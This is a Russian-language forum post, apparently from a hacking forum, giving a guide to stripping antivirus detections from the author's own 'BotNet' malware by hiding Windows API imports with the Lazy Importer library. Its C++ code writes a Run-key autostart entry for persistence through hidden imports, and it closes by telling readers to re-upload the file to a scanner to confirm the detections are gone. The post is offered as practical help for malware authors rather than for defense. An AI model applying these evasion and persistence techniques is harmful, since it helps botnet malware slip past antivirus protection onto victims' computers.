[TrashCode #4] Guide on how to remove detections from a file without a C++ crypter.

Всем привет! это краткий гайд о том, как убрать детекты с файла.
Сразу скажу, для данных манипуляций вам нужен исходный код программы.
Способ очень простой, и я думаю с ним справиться каждый!
Для примера, я взял "BotNet" с одной из моих прошлых статей. Статья

Скрин детектов до:

Скрин детектов после, будет в самом конце.

1. Что нам понадобится, это библиотека Lazy Importer. GutHub.
Подключаем данную библиотеку к проекту, тут я думаю вы справитесь сами, тк данный гайд не об этом.

2. Вам надо понять какую именно функцию детектит ваш антивирус, если вы не знаете, или не можете проверить, то скрывайте импорты всех функций.
В моём случае детектит запись в реестр, вот на примере её и будем работать!

Вот что есть у нас на данный момент.

3. Пишем код.
Попытаюсь максимально откомментировать код, но если будут вопросы, пишите в лс, помогу!

Код

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");
auto kernel = LI_FN(LoadLibraryA)("Kernel32.dll");
//Тут мы подключили dll из которых будем доставать функцию

if (LI_FN(RegCreateKeyExA).in(winreg)(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL) == ERROR_SUCCESS)
{
if (LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)) == ERROR_SUCCESS)
{
LI_FN(RegCloseKey).in(winreg)(hKey);
}
return;
}

//Что у нас получилось в итоге

Code

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

auto kernel = LI_FN(LoadLibraryA)("Kernel32.dll");

//Тут мы подключили dll из которых будем доставать функцию



    if (LI_FN(RegCreateKeyExA).in(winreg)(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL) == ERROR_SUCCESS)

    {

        if (LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)) == ERROR_SUCCESS)

        {

            LI_FN(RegCloseKey).in(winreg)(hKey);

        }

        return;

    }



//Что у нас получилось в итоге

4. О коде.

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

Code

auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");

Тут, например вместо Advapi32.dll надо писать название своей dll к которой привязана функция, где её брать?
В поисковик пишем название функции, например: RegCreateKeyEx, и переходим на офф сайт майкрософт, и листаем страницу вниз.
Вот название DLL.

фото

LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)

Code

LI_FN(RegSetValueExA).in(winreg)(hKey, "istream", NULL, REG_SZ, (LPBYTE)arr, sizeof(arr)

FI_FN - вызываем Lazy Importer
(RegSetValueExA) - Название функции
.in(winreg) - откуда мы импортируем эту функцию (auto winreg = LI_FN(LoadLibraryA)("Advapi32.dll");)

Покажу ещё тоже самое раз но например на MessageBox.

код

auto user32 = LI_FN(LoadLibraryA)("User32.dll"); //Загружаем DLL [/B][/B]
[B][B]LI_FN(MessageBoxA).in(user32)(0, "ItWork!", "ItWork!", MB_OK); //Вызываем функцию

Code

    auto user32 = LI_FN(LoadLibraryA)("User32.dll"); //Загружаем DLL    [/B][/B]

[B][B]LI_FN(MessageBoxA).in(user32)(0, "ItWork!", "ItWork!", MB_OK); //Вызываем функцию

5. После того как мы скрыли импорты, заливаем файл на сканер.

Готово!

На этом, всё.
К слову скажу, что-бы не было негатива, это не единственный способ, и не всегда самый действенный, но он работает!

Не откажусь от звезды на GitHub в знак благодарности.
Всем спасибо!